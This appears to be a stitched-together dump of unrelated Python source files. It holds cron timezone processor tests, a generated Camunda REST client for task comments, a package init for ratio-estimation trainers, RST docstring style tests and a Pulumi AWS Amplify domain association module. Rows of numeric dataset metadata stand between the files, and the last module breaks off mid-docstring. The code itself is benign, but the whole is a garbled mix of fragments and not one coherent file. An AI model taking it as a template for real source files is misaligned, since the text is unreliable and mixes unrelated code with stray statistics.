with freezegun.freeze_time('2019-08-01 01:00 UTC'):
processor = TimezoneAwareProcessor(mock_callable, trigger)
with freezegun.freeze_time('2019-08-01 11:00 UTC'):
processor()
mock_callable.assert_not_called() # not yet
with freezegun.freeze_time('2019-08-01 15:00 UTC') as frozen_time:
processor()
frozen_time.tick(delta=datetime.timedelta(microseconds=10))
processor()
mock_callable.assert_called_once_with()
def test_timezone_aware_processor_doesnt_doesnt_bubble_internal_exceptions() -> None:
# Note: the processor assumes that the callable they're passed won't raise,
# because that is assumed to be `cron.process_job` which has its own error
# handling. The processor does howver need to ensure that other errors it
# may encounter while checking whether to run are handled.
mock_callable = mock.Mock()
trigger = TimezoneAwareTrigger(datetime.time(12, 0), 'Etc/UTC')
with freezegun.freeze_time('2019-08-01 01:00 UTC'):
processor = TimezoneAwareProcessor(mock_callable, trigger)
with freezegun.freeze_time('2019-08-01 11:00 UTC'):
processor()
mock_callable.assert_not_called() # not yet
with freezegun.freeze_time('2019-08-01 15:00 UTC'):
processor()
# Deliberately reproduce the impossible scenario which
# test_timezone_aware_processor_doesnt_run_multiple_times carefully
# avoids
processor()
mock_callable.assert_called_once_with()
# Test MetadataTimezoneAwareProcessor
def test_metadata_timezone_aware_processor_repr() -> None:
mock_callable = mock.Mock()
trigger = MetadataTimezoneAwareTrigger(datetime.time(12, 0), ['tz'])
with freezegun.freeze_time(recently()):
processor = MetadataTimezoneAwareProcessor(mock_callable, trigger)
assert 'tz' in repr(processor)
assert '12:00' in repr(processor)
@freezegun.freeze_time('2019-01-01 12:00 UTC')
def test_metadata_timezone_aware_processor_runs_on_time() -> None:
mock_callable = mock.Mock()
trigger = MetadataTimezoneAwareTrigger(datetime.time(12, 0), ['tz'])
with freezegun.freeze_time(recently()):
processor = MetadataTimezoneAwareProcessor(mock_callable, trigger)
with mock_cron_processors_functools_partial() as mock_partial:
processor()
mock_partial.assert_called_once_with(
labels_in_state_with_metadata,
path=['tz'],
values=mock.ANY,
)
timezones = mock_partial.call_args[1]['values']
assert 'Etc/UTC' in timezones
assert 'Europe/London' in timezones
mock_callable.assert_called_once_with(label_provider=mock.ANY)
@freezegun.freeze_time('2019-08-01 12:00 UTC')
def test_metadata_timezone_aware_processor_runs_on_time_other_timezone() -> None:
mock_callable = mock.Mock()
trigger = MetadataTimezoneAwareTrigger(datetime.time(13, 0), ['tz'])
with freezegun.freeze_time(recently()):
processor = MetadataTimezoneAwareProcessor(mock_callable, trigger)
with mock_cron_processors_functools_partial() as mock_partial:
processor()
mock_partial.assert_called_once_with(
labels_in_state_with_metadata,
path=['tz'],
values=mock.ANY,
)
timezones = mock_partial.call_args[1]['values']
assert 'Etc/UTC' not in timezones
assert 'Europe/London' in timezones
mock_callable.assert_called_once_with(label_provider=mock.ANY)
@freezegun.freeze_time('2019-08-01 12:05 UTC')
def test_metadata_timezone_processor_doesnt_run_at_wrong_time() -> None:
mock_callable = mock.Mock()
trigger = MetadataTimezoneAwareTrigger(datetime.time(12, 0), ['tz'])
with freezegun.freeze_time(recently()):
processor = MetadataTimezoneAwareProcessor(mock_callable, trigger)
with mock_cron_processors_functools_partial() as mock_partial:
processor()
mock_partial.assert_not_called()
mock_callable.assert_not_called()
@freezegun.freeze_time('2019-08-01 12:05 UTC')
def test_metadata_timezone_processor_runs_if_delayed_since_construction() -> None:
mock_callable = mock.Mock()
trigger = MetadataTimezoneAwareTrigger(datetime.time(12, 0), ['tz'])
with freezegun.freeze_time('2019-08-01 11:59 UTC'):
processor = MetadataTimezoneAwareProcessor(mock_callable, trigger)
with mock_cron_processors_functools_partial() as mock_partial:
processor()
mock_partial.assert_called_once_with(
labels_in_state_with_metadata,
path=['tz'],
values=mock.ANY,
)
timezones = mock_partial.call_args[1]['values']
assert 'Etc/UTC' in timezones
assert 'Europe/London' not in timezones
mock_callable.assert_called_once_with(label_provider=mock.ANY)
@freezegun.freeze_time('2019-08-01 12:05 UTC')
def test_metadata_timezone_processor_runs_if_delayed_since_last_run() -> None:
mock_callable = mock.Mock()
trigger = MetadataTimezoneAwareTrigger(datetime.time(12, 0), ['tz'])
with freezegun.freeze_time('2019-08-01 11:55 UTC'):
processor = MetadataTimezoneAwareProcessor(mock_callable, trigger)
with freezegun.freeze_time('2019-08-01 11:58 UTC'):
with mock_cron_processors_functools_partial() as mock_partial:
processor()
mock_partial.assert_not_called() # not yet
with mock_cron_processors_functools_partial() as mock_partial:
processor()
mock_partial.assert_called_once_with(
labels_in_state_with_metadata,
path=['tz'],
values=mock.ANY,
)
timezones = mock_partial.call_args[1]['values']
assert 'Etc/UTC' in timezones
assert 'Europe/London' not in timezones
mock_callable.assert_called_once_with(label_provider=mock.ANY)
def test_metadata_timezone_processor_doesnt_run_multiply() -> None:
mock_callable = mock.Mock()
trigger = MetadataTimezoneAwareTrigger(datetime.time(12, 0), ['tz'])
with freezegun.freeze_time('2019-08-01 11:58 UTC'):
processor = MetadataTimezoneAwareProcessor(mock_callable, trigger)
with freezegun.freeze_time('2019-08-01 12:05 UTC') as frozen_time:
with mock_cron_processors_functools_partial() as mock_partial:
processor()
frozen_time.tick(delta=datetime.timedelta(microseconds=10))
processor()
mock_partial.assert_called_once_with(
labels_in_state_with_metadata,
path=['tz'],
values=mock.ANY,
)
timezones = mock_partial.call_args[1]['values']
assert 'Etc/UTC' in timezones
assert 'Europe/London' not in timezones
mock_callable.assert_called_once_with(label_provider=mock.ANY)
def test_metadata_timezone_processor_doesnt_bubble_internal_exceptions() -> None:
# Note: the processor assumes that the callable they're passed won't raise,
# because that is assumed to be `cron.process_job` which has its own error
# handling. The processor does howver need to ensure that other errors it
# may encounter while checking whether to run are handled.
mock_callable = mock.Mock()
trigger = MetadataTimezoneAwareTrigger(datetime.time(12, 0), ['tz'])
with freezegun.freeze_time('2019-08-01 11:58 UTC'):
processor = MetadataTimezoneAwareProcessor(mock_callable, trigger)
with freezegun.freeze_time('2019-08-01 12:05 UTC'):
processor()
# Deliberately reproduce the impossible scenario which
# test_metadata_timezone_processor_doesnt_run_multiply carefully
# avoids
processor()
mock_callable.assert_called_once_with(label_provider=mock.ANY)
| 32.53719
| 85
| 0.725933
| 1,461
| 11,811
| 5.601643
| 0.116359
| 0.076246
| 0.081256
| 0.07588
| 0.89174
| 0.883675
| 0.875
| 0.868157
| 0.860826
| 0.826491
| 0
| 0.040545
| 0.179324
| 11,811
| 362
| 86
| 32.627072
| 0.803776
| 0.100838
| 0
| 0.735426
| 0
| 0
| 0.078502
| 0.003499
| 0
| 0
| 0
| 0
| 0.174888
| 1
| 0.085202
| false
| 0
| 0.035874
| 0
| 0.125561
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5691d52a0ddfab215f02af6c00d1196d5a32c9b4
| 17,011
|
py
|
Python
|
openapi-python-client/openapi_client/api/task_comment_api.py
|
yanavasileva/camunda-bpm-examples
|
051f8f28c62845e68ce4059ab64264c5a0bdc009
|
[
"Apache-2.0"
] | null | null | null |
openapi-python-client/openapi_client/api/task_comment_api.py
|
yanavasileva/camunda-bpm-examples
|
051f8f28c62845e68ce4059ab64264c5a0bdc009
|
[
"Apache-2.0"
] | null | null | null |
openapi-python-client/openapi_client/api/task_comment_api.py
|
yanavasileva/camunda-bpm-examples
|
051f8f28c62845e68ce4059ab64264c5a0bdc009
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Camunda BPM REST API
OpenApi Spec for Camunda BPM REST API. # noqa: E501
The version of the OpenAPI document: 7.13.0
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from openapi_client.api_client import ApiClient
from openapi_client.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class TaskCommentApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_comment(self, id, **kwargs): # noqa: E501
"""create_comment # noqa: E501
Creates a comment for a task by id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_comment(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to add the comment to. (required)
:param CommentDto comment_dto: **Note:** Only the `message` property will be used. Every other property passed to this endpoint will be ignored.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: CommentDto
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.create_comment_with_http_info(id, **kwargs) # noqa: E501
def create_comment_with_http_info(self, id, **kwargs): # noqa: E501
"""create_comment # noqa: E501
Creates a comment for a task by id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_comment_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to add the comment to. (required)
:param CommentDto comment_dto: **Note:** Only the `message` property will be used. Every other property passed to this endpoint will be ignored.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(CommentDto, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'comment_dto'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method create_comment" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `create_comment`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'comment_dto' in local_var_params:
body_params = local_var_params['comment_dto']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/task/{id}/comment/create', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CommentDto', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_comment(self, id, comment_id, **kwargs): # noqa: E501
"""get_comment # noqa: E501
Retrieves a task comment by task id and comment id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_comment(id, comment_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task. (required)
:param str comment_id: The id of the comment to be retrieved. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: CommentDto
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_comment_with_http_info(id, comment_id, **kwargs) # noqa: E501
def get_comment_with_http_info(self, id, comment_id, **kwargs): # noqa: E501
"""get_comment # noqa: E501
Retrieves a task comment by task id and comment id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_comment_with_http_info(id, comment_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task. (required)
:param str comment_id: The id of the comment to be retrieved. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(CommentDto, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'comment_id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_comment" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_comment`") # noqa: E501
# verify the required parameter 'comment_id' is set
if self.api_client.client_side_validation and ('comment_id' not in local_var_params or # noqa: E501
local_var_params['comment_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `comment_id` when calling `get_comment`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'comment_id' in local_var_params:
path_params['commentId'] = local_var_params['comment_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/task/{id}/comment/{commentId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CommentDto', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_comments(self, id, **kwargs): # noqa: E501
"""get_comments # noqa: E501
Gets the comments for a task by id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_comments(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to retrieve the comments for. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: list[CommentDto]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_comments_with_http_info(id, **kwargs) # noqa: E501
def get_comments_with_http_info(self, id, **kwargs): # noqa: E501
"""get_comments # noqa: E501
Gets the comments for a task by id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_comments_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to retrieve the comments for. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(list[CommentDto], status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_comments" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_comments`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/task/{id}/comment', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[CommentDto]', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
| 42.741206
| 152
| 0.584328
| 1,935
| 17,011
| 4.909561
| 0.098708
| 0.043789
| 0.061895
| 0.028421
| 0.916947
| 0.906316
| 0.898947
| 0.892737
| 0.879263
| 0.879263
| 0
| 0.015618
| 0.341309
| 17,011
| 397
| 153
| 42.848867
| 0.832218
| 0.461231
| 0
| 0.688172
| 1
| 0
| 0.156737
| 0.031273
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037634
| false
| 0
| 0.026882
| 0
| 0.102151
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
56a60f46f53ff3d5f94c29ae341ddd25dff9107d
| 394
|
py
|
Python
|
hypothesis/auto/training/__init__.py
|
JoeriHermans/hypothesis
|
29a2b7b4649db345d43a8d3bf98aa5d817b43f1b
|
[
"BSD-3-Clause"
] | 45
|
2019-02-13T14:16:35.000Z
|
2022-02-23T21:30:02.000Z
|
hypothesis/auto/training/__init__.py
|
JoeriHermans/hypothesis
|
29a2b7b4649db345d43a8d3bf98aa5d817b43f1b
|
[
"BSD-3-Clause"
] | 1
|
2020-01-13T08:29:50.000Z
|
2020-01-22T10:28:02.000Z
|
hypothesis/auto/training/__init__.py
|
JoeriHermans/hypothesis
|
29a2b7b4649db345d43a8d3bf98aa5d817b43f1b
|
[
"BSD-3-Clause"
] | 8
|
2019-04-23T14:25:08.000Z
|
2021-07-28T15:05:31.000Z
|
from .base import BaseTrainer
from .amortized_ratio_estimation import BaseAmortizedRatioEstimatorTrainer
from .amortized_ratio_estimation import LikelihoodToEvidenceRatioEstimatorTrainer
from .amortized_ratio_estimation import LikelihoodToEvidenceCriterion
from .amortized_ratio_estimation import ConservativeLikelihoodToEvidenceCriterion
from .amortized_ratio_estimation import create_trainer
| 56.285714
| 81
| 0.923858
| 35
| 394
| 10.085714
| 0.371429
| 0.184136
| 0.254958
| 0.396601
| 0.481586
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.060914
| 394
| 6
| 82
| 65.666667
| 0.954054
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
3b6ca5ed0859acf5d352241bcfea4c7294f1f40d
| 6,493
|
py
|
Python
|
tests/rst/test_style.py
|
LudditeLabs/autodoc-tool
|
b4ae7e3b61907e7e9c3a1b534fce055e5860ffab
|
[
"Apache-2.0"
] | null | null | null |
tests/rst/test_style.py
|
LudditeLabs/autodoc-tool
|
b4ae7e3b61907e7e9c3a1b534fce055e5860ffab
|
[
"Apache-2.0"
] | null | null | null |
tests/rst/test_style.py
|
LudditeLabs/autodoc-tool
|
b4ae7e3b61907e7e9c3a1b534fce055e5860ffab
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2018 Luddite Labs Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from autodoc.contentdb import Arg
docstring_style = 'rst'
docstring_keep_transforms = True
# TODO: add more tests.
# Test: convert python docstring to plan reStructuredText.
class TestStyleRst:
# Test: complex docstring.
def test_complex(self, assert_py_doc):
args = (Arg('sender', ['str']),
Arg('recipient', ['str']),
Arg('message_body', ['str']),
Arg('priority', ['integer', 'float']))
assert_py_doc(
args=args,
text="""
This is an ordinary paragraph.
>>> print 'this is a Doctest block'
this is a Doctest block
The following is a literal block::
>>> This is not recognized as a doctest block by
reStructuredText. It *will* be recognized by the doctest
module, though!
.. versionadded:: 0.10
Bottom line.
:parameter:
:param str sender: The person sending the message
:param str message_body: The body of the message
:param str recipient: NOTE! THIS PARAM MUST BE PLACED AFTER sender!
:parameter priority: The priority of the message,
can be a number 1-5
:type priority: integer or float
:return bla bla: Hz
:return: the message id
:rtype: int
:return: the message id2
:rtype: char
:rtype: string
:raises ValueError: if the message_body exceeds 160 characters
:raises TypeError: if the message_body is not a basestring
.. seealso:: Another function.
.. note:: Lorem ipsum dolor sit amet, consectetur adipiscing elit.
:Yields: eos qui ratione voluptatem sequi nesciunt.
Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet
""",
expected="""
This is an ordinary paragraph.
>>> print 'this is a Doctest block'
this is a Doctest block
The following is a literal block::
>>> This is not recognized as a doctest block by
reStructuredText. It *will* be recognized by the doctest
module, though!
.. versionadded:: 0.10
Bottom line.
:param str sender: The person sending the message
:param str recipient: NOTE! THIS PARAM MUST BE PLACED AFTER sender!
:param str message_body: The body of the message
:param priority: The priority of the message, can be a number 1-5
:type priority: integer or float
:returns: the message id
:rtype: int
:returns: the message id2
:rtype: char
:rtype: string
:raises ValueError: if the message_body exceeds 160 characters
:raises TypeError: if the message_body is not a basestring
:Yields: eos qui ratione voluptatem sequi nesciunt. Neque porro
quisquam est, qui dolorem ipsum quia dolor sit amet
.. seealso:: Another function.
.. note:: Lorem ipsum dolor sit amet, consectetur adipiscing elit.
"""
)
# Test: add missing params.
def test_missing_params(self, assert_py_doc):
args = (Arg('sender', ['str']),
Arg('recipient', ['str']),
Arg('message_body', ['str']))
assert_py_doc(
args=args,
text="""
This is an ordinary paragraph.
>>> print 'this is a Doctest block'
this is a Doctest block
The following is a literal block::
>>> This is not recognized as a doctest block by
reStructuredText. It *will* be recognized by the doctest
module, though!
.. versionadded:: 0.10
Bottom line.
.. seealso:: Another function.
.. note:: Lorem ipsum dolor sit amet, consectetur adipiscing elit.
""",
expected="""
This is an ordinary paragraph.
>>> print 'this is a Doctest block'
this is a Doctest block
The following is a literal block::
>>> This is not recognized as a doctest block by
reStructuredText. It *will* be recognized by the doctest
module, though!
.. versionadded:: 0.10
Bottom line.
.. seealso:: Another function.
.. note:: Lorem ipsum dolor sit amet, consectetur adipiscing elit.
:param str sender:
:param str recipient:
:param str message_body:
"""
)
# Test: keyword field.
def test_keyword(self, assert_py_doc):
assert_py_doc(
text="""
This is an ordinary paragraph.
:keyword name: Same as examples section.
Quis autem vel eum iure reprehenderit qui
Examples should be written in doctest format,
illustrate how to use the function.
:kwtype name: str, sds
:keyword one: Examples should be written in doctest format
:kwtype one: int
Bottom line.
""",
expected="""
This is an ordinary paragraph.
:keyword name: Same as examples section. Quis autem vel eum iure
reprehenderit qui Examples should be written in doctest format,
illustrate how to use the function.
:kwtype name: str, sds
:keyword int one: Examples should be written in doctest format
Bottom line.
"""
)
| 34.173684
| 79
| 0.556907
| 730
| 6,493
| 4.915068
| 0.269863
| 0.0301
| 0.043478
| 0.031215
| 0.751115
| 0.739967
| 0.736622
| 0.736622
| 0.713768
| 0.713768
| 0
| 0.007899
| 0.376097
| 6,493
| 189
| 80
| 34.354497
| 0.877808
| 0.107962
| 0
| 0.710938
| 0
| 0
| 0.859518
| 0
| 0
| 0
| 0
| 0.005291
| 0.046875
| 1
| 0.023438
| false
| 0
| 0.007813
| 0
| 0.039063
| 0.03125
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3b83e4eb7d53ed38f184b0024c772b753de49ee4
| 18,870
|
py
|
Python
|
sdk/python/pulumi_aws/amplify/domain_association.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2021-11-10T16:33:40.000Z
|
2021-11-10T16:33:40.000Z
|
sdk/python/pulumi_aws/amplify/domain_association.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/amplify/domain_association.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['DomainAssociationArgs', 'DomainAssociation']
@pulumi.input_type
class DomainAssociationArgs:
def __init__(__self__, *,
app_id: pulumi.Input[str],
domain_name: pulumi.Input[str],
sub_domains: pulumi.Input[Sequence[pulumi.Input['DomainAssociationSubDomainArgs']]],
wait_for_verification: Optional[pulumi.Input[bool]] = None):
"""
The set of arguments for constructing a DomainAssociation resource.
:param pulumi.Input[str] app_id: The unique ID for an Amplify app.
:param pulumi.Input[str] domain_name: The domain name for the domain association.
:param pulumi.Input[Sequence[pulumi.Input['DomainAssociationSubDomainArgs']]] sub_domains: The setting for the subdomain. Documented below.
:param pulumi.Input[bool] wait_for_verification: If enabled, the resource will wait for the domain association status to change to `PENDING_DEPLOYMENT` or `AVAILABLE`. Setting this to `false` will skip the process. Default: `true`.
"""
pulumi.set(__self__, "app_id", app_id)
pulumi.set(__self__, "domain_name", domain_name)
pulumi.set(__self__, "sub_domains", sub_domains)
if wait_for_verification is not None:
pulumi.set(__self__, "wait_for_verification", wait_for_verification)
@property
@pulumi.getter(name="appId")
def app_id(self) -> pulumi.Input[str]:
"""
The unique ID for an Amplify app.
"""
return pulumi.get(self, "app_id")
@app_id.setter
def app_id(self, value: pulumi.Input[str]):
pulumi.set(self, "app_id", value)
@property
@pulumi.getter(name="domainName")
def domain_name(self) -> pulumi.Input[str]:
"""
The domain name for the domain association.
"""
return pulumi.get(self, "domain_name")
@domain_name.setter
def domain_name(self, value: pulumi.Input[str]):
pulumi.set(self, "domain_name", value)
@property
@pulumi.getter(name="subDomains")
def sub_domains(self) -> pulumi.Input[Sequence[pulumi.Input['DomainAssociationSubDomainArgs']]]:
"""
The setting for the subdomain. Documented below.
"""
return pulumi.get(self, "sub_domains")
@sub_domains.setter
def sub_domains(self, value: pulumi.Input[Sequence[pulumi.Input['DomainAssociationSubDomainArgs']]]):
pulumi.set(self, "sub_domains", value)
@property
@pulumi.getter(name="waitForVerification")
def wait_for_verification(self) -> Optional[pulumi.Input[bool]]:
"""
If enabled, the resource will wait for the domain association status to change to `PENDING_DEPLOYMENT` or `AVAILABLE`. Setting this to `false` will skip the process. Default: `true`.
"""
return pulumi.get(self, "wait_for_verification")
@wait_for_verification.setter
def wait_for_verification(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "wait_for_verification", value)
@pulumi.input_type
class _DomainAssociationState:
def __init__(__self__, *,
app_id: Optional[pulumi.Input[str]] = None,
arn: Optional[pulumi.Input[str]] = None,
certificate_verification_dns_record: Optional[pulumi.Input[str]] = None,
domain_name: Optional[pulumi.Input[str]] = None,
sub_domains: Optional[pulumi.Input[Sequence[pulumi.Input['DomainAssociationSubDomainArgs']]]] = None,
wait_for_verification: Optional[pulumi.Input[bool]] = None):
"""
Input properties used for looking up and filtering DomainAssociation resources.
:param pulumi.Input[str] app_id: The unique ID for an Amplify app.
:param pulumi.Input[str] arn: The Amazon Resource Name (ARN) for the domain association.
:param pulumi.Input[str] certificate_verification_dns_record: The DNS record for certificate verification.
:param pulumi.Input[str] domain_name: The domain name for the domain association.
:param pulumi.Input[Sequence[pulumi.Input['DomainAssociationSubDomainArgs']]] sub_domains: The setting for the subdomain. Documented below.
